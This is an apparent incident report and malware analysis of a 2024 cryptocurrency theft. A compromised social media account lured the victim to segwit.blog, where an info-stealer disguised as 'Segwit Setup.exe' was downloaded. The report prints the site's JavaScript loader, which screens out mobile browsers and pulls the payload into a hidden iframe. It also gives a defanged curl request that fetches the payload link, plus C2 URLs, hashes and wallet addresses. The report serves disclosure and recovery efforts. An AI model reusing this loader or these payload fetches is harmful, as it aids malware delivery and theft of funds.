Cryptocurrency Theft: Segwit.blog

{%hackmd C76nuH1pTfedlTW7n2cwbQ %} # Cryptocurrency Theft: Segwit.blog > **Overview**: > An individual fell victim to a sophisticated cyber scam involving social engineering and malware, orchestrated through a compromised social media account. The attacker deceived the victim into downloading and executing a malicious file, purportedly for project collaboration, which led to the unauthorized access and theft of cryptocurrency assets. The total value stolen amounted to approximately 7.26 Ethereum, equivalent to around $28,174.80 USD at the time of the theft. | **Subject** | **Detail** | |:-------------------------------------------------- | ----------------------------------------------------------------------- | | event date and time | `Mar-06-2024 07:09:06 PM +UTC` | | website for malicious payload delivery and payload | `Segwit.exe` was `Segwit.blog` | | `segwit.blog` website snapshot | [Link](https://urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/) | Report TLP Classification: Clear #### Case Relevant Cryptocurrency Addresses | **Label** | **Cryptocurrency Address** | |:-----------------------|-------------------------------------------------------------------------------------------| | **Scammer Wallet Address** | 0x5959424246a971d115dd2394c9fcfb9e1b7df54e | | **Victim Wallet Address 1** | 0x311a1e4244a134fe0efd64cdf2e66203fd6e1c81 | | **Victim Wallet Address 2** | 0xfcae090af3dfd6f4eca847aac286c800ba8e70cc | ## Events Prior to Theft [ As Reported By [Intelligence On Chain](https://intelligenceonchain.com/) ] On March 6, 2024, `Victim alias: Redacted` was on the social media platform formerly known as Twitter, now going by "X", when he was reached out to by the user: @BowFr0g, a non-fungible token artist with whom the victim was familiar and had interacted/conversed with via Twitter Spaces and direct messages a number of times in the past. The individual: @BowFr0g, was someone the victim had grown to trust. Unbeknownst to `Victim alias: Redacted`, the Twitter account belonging to `@Bowfr0g` had been compromised the day prior. The user purporting to be `@Bowfr0g` postulated that the `Victim alias: Redacted` may be able to help with them with the phrasing, advertising, and ask me anything (AMA) -related duties for the project they were working on (in the form of a kind of live publicity event). However, according to the actual user who later reached out to a mutual associate via phone call, it was confirmed that `@Bowfr0g` had been compromised. Effectively, `Victim alias: Redacted` was socially engineered by the scammer/malicious actor to visit the website: `Segwit.blog`, and download the executable `Segwit.exe` both of which were scanned via VirusTotal and which no malware signatures were detected. Consequently, the victim proceeded to run the file on their personal computer. This action triggered the execution of the malicious payload, leading to the unauthorized withdrawal of the victim's funds. Current analysis of malicious executables retrieved from the compromised machine by analysts contain references to file hash signatures correlating to a conjunction of the malware families: "Rhadamanthys" and "Stealc", both of which are known to have been utilized in info-stealer capacities. The malware retrieved `Victim alias: Redacted` private keys for blockchain cryptocurrency accounts wallets, and withdrew assets amounting to a total of approximately 7.26 Ethereum (valued at roughly $28,174.80 USD at the time) taken via the Arbitrum network. After the successful theft, the malicious actor in possession of the `@BowFr0g` account deleted the conversation, blocked the victim, and began liberating assets for their prompt withdrawal and transfer through Orbiter bridge, the funds were transferred to a number of additional addresses, but ultimately arrived at MEXC for routing through the decentralized exchange. Multiple IC3 reports have been filed and the relevant cryptocurrency exchange, MEXC, was emailed with regards to the fund provenance. MEXC kindly reported to have frozen the assets (as of the evening of March 8, 2024, for a time not to exceed 48 hours), provided that law enforcement sent the exchange official notice of an investigation. ### Transactions Analysis - Documented below is the malicious actor's address:`0x5959424246a971d115dd2394c9fcfb9e1b7df54e` via the arbitrum blockchain bridging the stolen assets to the ethereum chain through [Orbiter Finance](https://www.orbiter.finance). - Transaction visualization below: ```mermaid flowchart TB subgraph transaction id1[0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101] click id1 "https://app.dedaub.com/arbitrum/tx/0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101" "0x0dd5159d47253c4d81985f0a96945de62834a2decbad082107058fbecb065101" subgraph Sender s_address["Address: 0x5959424246a971d115dd2394c9fcfb9e1b7df54e"] click s_address "https://app.dedaub.com/arbitrum/address/0x5959424246a971d115dd2394c9fcfb9e1b7df54e/overview" "0x5959424246a971d115dd2394c9fcfb9e1b7df54e" end id2[transfer: 7.2575 Ethereum] subgraph Recipient r_address["Address: 0x80c67432656d59144ceff962e8faf8926599bcf8"] click r_address "https://app.dedaub.com/arbitrum/address/0x80c67432656d59144ceff962e8faf8926599bcf8/overview" "0x80c67432656d59144ceff962e8faf8926599bcf8" end end subgraph "Transaction Data" evt_data["Date: 2024-03-06 | Chain: ARB"] end s_address --> id2 --> r_address ``` ## Associated Transactions ### Direct Associations <details> <summary>Instance relevant cryptocurrency theft transaction hashes available below: </summary> | **0x311A1e4244A134FE0efD64cdF2E66203fd6E1C81** [Arbitrum] | **0xFcaE090AF3Dfd6f4eCA847aAC286c800BA8e70Cc** [Arbitrum] | | --- | --- | | 0x3709a6bf9347a2dc67fd00667fadfc6f84f115bfd528ba1f692abb8299aa8966 | 0x561fab4854b5366737a8c7f35a7e33f0e8d8ead69a9691e422f0b2273a4da99b | | 0x06865b640a80e42256fce573781f2a3c45e72d634f3337b50568b2338cff0fe3 | 0x1753d06e9a5fd75ff882f37bfe07d363928d7a8472b1151609c2a63a75315799 | | 0x9639514c3ce7f23858e433c66514a6bf97ddd62894edf626e3faa8371d960463 | 0xce6174f6013790ce7531eadc99c65ca14830df754d76a565262ec7128450f41a | | 0x24621fba6568dca26e9f9bf6bc09e488436ee901b2adb25c3a6a98af42f9ff5d | 0xcb5f4d618486ae0c87cdb432bac746036b09086c30b6596e0c7ceb98bb882c51 | | 0xb9346f5faab89fb9ecfc09730cb45be381176c66632c003592fdbba2bdffbda8 | 0x21ae92254e029ae01142420c80e847f1afa926d86570a1eff2e3a9218612a0a8 | | 0xf120d370308f7f0793ce08bc2c8b17f673b2ec992003f483aeab9fbee9bf577f | 0xb140aead24b205f2bc376c462b8fd22f0b41ac4a8de2e55da1612cbd620c1f48 | | 0xc650593b039f46a0ba100f6e0de8f919c47389b8d75e611f4a49417e4e52c3b4 | | 0x2246499de9a5ef4f2356d99e74f7063fe1a3fb3c30afa35a1b462f92f5e1e0df | | 0x830c7cb8041fb44cb4b787115278cb2b02eca4ea80b0a64172977d7a7fffad6e | | 0x175741116734a30e5e4dd7b52a0bb8e1c93a1ffd65b83aae1b7d45e6173908f4 | | 0x5aff9cff89406b79e94497a5ab3ab69cab9a2c98c5229e7e39ad405a0760e615 | | 0xd37b22f6d0578d73532d929c83de3cd5d1af787e13d41d4c56c82c27207291a9 | | 0x820811da9b0ef28b461929307bc8e0da54fe79732978053fafdf8dc09dfc528e | | 0xfe80d5a74fcf06f247b5085265bbe403aeebf40966e3e346ff6715d91f6ae40b | | 0x8da1be3ccdbb83d96e52617482bf57b43d65bccc41074a87acd4342010a8a2e4 | | 0x7a79e79f13831756b9c0d070bc814ca0f2bc87eec8f302abfdebdd82b7ff826a | | 0x73c1679c20c542611304a35f192904301cdb80b07b0d496fd3700bfc1033be84 | | 0x18edea14bcc99250f381fda319519b2f6e1fb7bcacd1588619cfdbb6e5ad697a | | 0x92f34ebb02229a025a87fc2c4a3b01248b7931a03e1100f3947da93285415653 | | 0x638495f77d3271d91e1ac6ad1ca5c088519e9c1ece6505dd254532fe7c7be18a | | 0x6db584ab71a04b3fc9185bfc5554f27ef030aa18b6f3c3cc964f5127cd9eda01 | </details> ### Associated Cryptocurrency Exchange Deposit Addresses | **chain** | **address** | **label** | **link** | | --- | --- | --- | --- | | ethereum | 0x4afd85bb51904765f2482ba59ff6849b3783f988 | mexc_deposit_eth_0x4afd85bb519 | <https://app.dedaub.com/ethereum/address/0x4afd85bb51904765f2482ba59ff6849b3783f988/overview> | | ethereum | 0x4a2cd0cce873aa5a67599d4842a2ac597ed6c0ff | mexc_deposit_eth_0x4a2cd0cce87 | <https://app.dedaub.com/ethereum/address/0x4a2cd0cce873aa5a67599d4842a2ac597ed6c0ff/overview> | | ethereum | 0x2f41146d6ead97daa2733f61a590982305d9113e | okx_deposit_eth_0x2f41146d6ead | <https://app.dedaub.com/ethereum/address/0x2f41146d6ead97daa2733f61a590982305d9113e/overview> | ## Technical Analysis From the victim’s browser activity and file downloads interactions with `Segwit.blog` and `Segwit.exe` were confirmed. As such, the relevant source code of `Segwit.blog` has been analyzed, stored, and cataloged if needed for further analysis. The following section will elaborate on analysis conducted regarding `Segwit.blog` **Preface:** The primary function of `Segwit.blog` is to serve as a social engineering agent and as a malware payload delivery system. **Analysis Environment Configuration:** Analysis on `Segwit.blog` conducted at 11:30PM EST March 7th, 2024. Utilized browserling.com virtual instance in a Windows 10 configuration running Google Chrome Version: 119. ![Segwit_blog_frontend](https://urlscan.io/screenshots/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e.png =600x400)`Segwit.blog`Frontend The image above is a sample captured of the `Segwit.blog` instance on the same day as the which funds were stolen from the victim. As can be observed the instance, clearly depicts an **"open"**,inviting **"web3 community"** environment. At a cursory glance, the instance does not appear malicious, if anything quite the contrary, all users need to do is simply provide a wallet address and sign-up. And logically install their `Segwit Setup.exe`. The issue is that the website has been intentionally designed with the premise of deceiving users and evading detection. How this was accomplished through the file-named: `7011-d483282552489351.js` will is documented below. ### 7011-d483282552489351.js <div style="display: flex; justify-content: space-between;"> <div align="left" style="width: 30%;"> ```mermaid flowchart TB start[start] checkAvailable[Check window.available<br><sub>Line: 4</sub>] checkBrowser[Check browser agent<br><sub>Lines: 6-9</sub>] osCheck[Check if Mac or Windows<br><sub>Line: 14</sub>] makePostRequest[Make API POST Request<br><sub>Lines: 14-20</sub>] handleError[Handle Error<br><sub>Line: 24</sub>] handleApiResponse[Handle API Response<br><sub>Lines: 22-23</sub>] createIframe[Create and Load Iframe<br><sub>Line: 30</sub>] setTrueState[Set True State<br><sub>Line: 25</sub>] showAlert[Show Alert<br><sub>Lines: 6, 15</sub>] start --> checkAvailable checkAvailable -->|false| checkBrowser checkAvailable -->|true| showAlert checkBrowser -->|Mobile| showAlert checkBrowser -->|Desktop| osCheck osCheck --> makePostRequest makePostRequest -->|Success| handleApiResponse --> createIframe --> setTrueState makePostRequest -->|Fail| handleError ``` </div> <div align="right" style="width: 70%; font-size: 12px;"> ```javascript= u = async (e) => { try { const test = function() { let check = false; (function(a) { if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true; })(navigator.userAgent || navigator.vendor || window.opera); return check; }; if (window.available === false || test()) { alert('Download is not available for your browser!'); return; } let t = await fetch(`/api/sign-up?system=${window.isMac ? 'mac': 'win'}&key=${window.__id}`, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(e), }); if (!t.ok) { let { error: e } = await t.json(); throw Error(e.message); } debugger; let data = await t.json(); var n = document.createElement("iframe"); n.style.display = "none"; n.src = data.data; document.body.appendChild(n); d(!0); } catch (e) { r.negative("Something went wrong. Please try again later."), console.error(e); } } ``` </div> </div> ### Code Explained The script performs device detection, conditional execution, API interaction, and dynamic content loading within a web environment: 1. **Device Type Detection**: Identifies mobile devices via user agent analysis to tailor behavior. 2. **Conditional Execution**: Uses `window.available` and device type to control flow, displaying alerts for incompatible devices, stopping further actions. 3. **API<sub>[^1]</sub> Interaction**: Makes a POST request to a sign-up API, including system type (Mac/Windows) in the request. This differentiation can affect server responses. 4. **Dynamic iFrame<sub>[^2]</sub> Creation**: On successful API response, creates an iframe element and loads content from the response into it. This step is key for seamlessly integrating additional content or scripts. 5. **Error Handling**: Implements try-catch for robust error management, providing generic failure notifications and logging errors for debugging. 6. **State Update**: Signals task completion or a state change within the application. These operations, particularly those of device detection and dynamic content loading via iframes, are leveraged to evade malicious signature detection by varying behavior based on the client's environment and discreetly executing additional code. [^1]: [API definition and reference](https://www.ibm.com/topics/api) [^2]: [iFrame definition and reference](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) ### Payload Delivery Executable Payload Delivered: `Segwit Setup.exe` Signatures: | **Algorithm** | **Name** | **File Hash** | |:----------------- | ---------- | ---------------------------------------------------------------------------------------------------------------------------------- | | `SegwitSetup.exe` | **MD5** | `a22d71549d6b60c8c270503f585530ec` | | `SegwitSetup.exe` | **SHA1** | `0cb40b824f878a46e7bd55498331f2b87ddd6b25` | | `SegwitSetup.exe` | **SHA256** | `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb` | | `SegwitSetup.exe` | **SHA512** | `165feee79662d7e37ac9224e6063cea9c37925927aa71065bad9dfb4f44a281cd96fbe243591f1ea731106b5a3031e26f4afc1b164ce8abe9a0d8e4f8af7593a` | The payload which `7011-d483282552489351.js` calls for via the [POST request](#7011-d483282552489351[.]js/api/sign-up?system=win) is a Windows executable file called `Segwit Setup.exe`, this was verified via a controlled, direct website interaction approximately six hours after the initial adverse event. The executable was stored on a [Dropbox account](#dropbox-response). This request was crafted to retrieve the payload while appearing as a benign file download to the user's device. #### 7011-d483282552489351[.]js/api/sign-up?system=win ```curl curl 'hxxps[://]segwit[.]blog/api/sign-up?system=win&key=null' \ -H 'authority: segwit[.]blog' \ -H 'accept: */*' \ -H 'accept-language: en-US,en;q=0.9' \ -H 'content-type: application/json' \ -H 'origin: hxxps[://]segwit[.]blog' \ -H 'referer: hxxps[://]segwit[.]blog/' \ -H 'sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "Windows"' \ -H 'sec-fetch-dest: empty' \ -H 'sec-fetch-mode: cors' \ -H 'sec-fetch-site: same-origin' \ -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119[.]0[.]0[.]0 Safari/537.36' \ --data-raw '{"ethAddress":"bobjones[.]eth"}' \ --compressed ``` #### dropbox-response ```json! { "resp": true, "data": "hxxps[://]www[.]dropbox[.]com/scl/fi/5sbs7pzead0zqy4gi7r4s/Segwit-Setup[.]exe?rlkey=bill6374m4u45wz6qifxnl7de&dl=1" } ``` ## Malware Analysis Through the successful quarantine of the malicious payload utilized against the victim, cursory network analysis was able to be conducted using Recorded Future's [Tria.ge](http://tria.ge/) [Segwit Setup.exe analysis iteration 1 via Tria.ge](https://tria.ge/240306-zavnnagg55/behavioral2) [Segwit Setup.exe analysis iteration 2 via Tria.ge](https://tria.ge/240310-jebtcafh2y) Tri.age was utilized in the capacity of its virtual machine to observe the behaviors of the malicious sample in a controlled environment, and it was also crucial in monitoring network calls made by the sample along with validating file hash signatures which were then utilized on Virustotal to develop a more accurate definition claiming that the malware utilized against the victim was a combination of the malware families of and [stealc](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc). Furthermore, from the Tri.age provided network packet capture instances, the network calls were able to be analyzed at greater depth using Dynamite Lab([packet analysis available here](https://lab.dynamite.ai/pcaps/8c5a887c-c71a-4069-9d30-1fa3a14ec897)) and Wireshark. Through numerous, different iterations it was concluded the control and command(C2) server employed by the malware was found at the destination IP address: 193[.]163[.]7[.]129, this information was further substantiated using data collected through [VirusTotal](#VirusTotal) from the `SegwitSetup` executable SHA256 file hash:`7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb`. ![packet_analysis](https://hackmd.io/_uploads/SyLrJswR6.png)PacketAnalysisResearch #### VirusTotal <iframe src="https://www.virustotal.com/graph/embed/gc6819d4939bf4632b603484761dd85a878474b32b9f94f8685735e98004e7371?theme=dark" width="1000" height="600"> </iframe> Structural Pattern Observed via Virustotal: ```csvpreview type,id url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/mozglue[.]dll url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/msvcp140[.]dll url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/freebl3[.]dll url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/nss3[.]dll url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/vcruntime140[.]dll url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/softokn3[.]dll url,hxxp[://]193[.]163[.]7[.]129/1d7bef10a75b8ff3[.]php url,hxxp[://]193[.]163[.]7[.]129/3fb765dac3e38c00/sqlite3[.]dll ``` ## Report Objectives <aside> 💡 The objective of this report is to disclose in as much detail as possible the research, it's respective findings, and the impacts incurred to the victim from the usage of this particular malware variant. The report has been composed to the best of our knowledge and capabilities with the hopes law enforcement assists with potential asset recovery by the means of freezing/withholding assets in transit through decentralized exchanges. Moreover, we would greatly appreciate the assistance of law enforcement in engaging the exchanges of MEXC and OKX. </aside> ## Conclusion Currently, based on the values transacted through the **Scammer Wallet Address** `0x5959424246a971d115dd2394c9fcfb9e1b7df54e`, the victim was subject to social engineering and malware as a service. ## References For a more comprehensive visual of the blockchain addresses interacted with, please refer to the graph below: [`Victim alias: Redacted` | MetaSleuth](https://metasleuth.io/result/arbitrum/0x5959424246a971d115dd2394c9fcfb9e1b7df54e?source=58a45c98-61cd-49f1-b8ce-6dd075ea229c)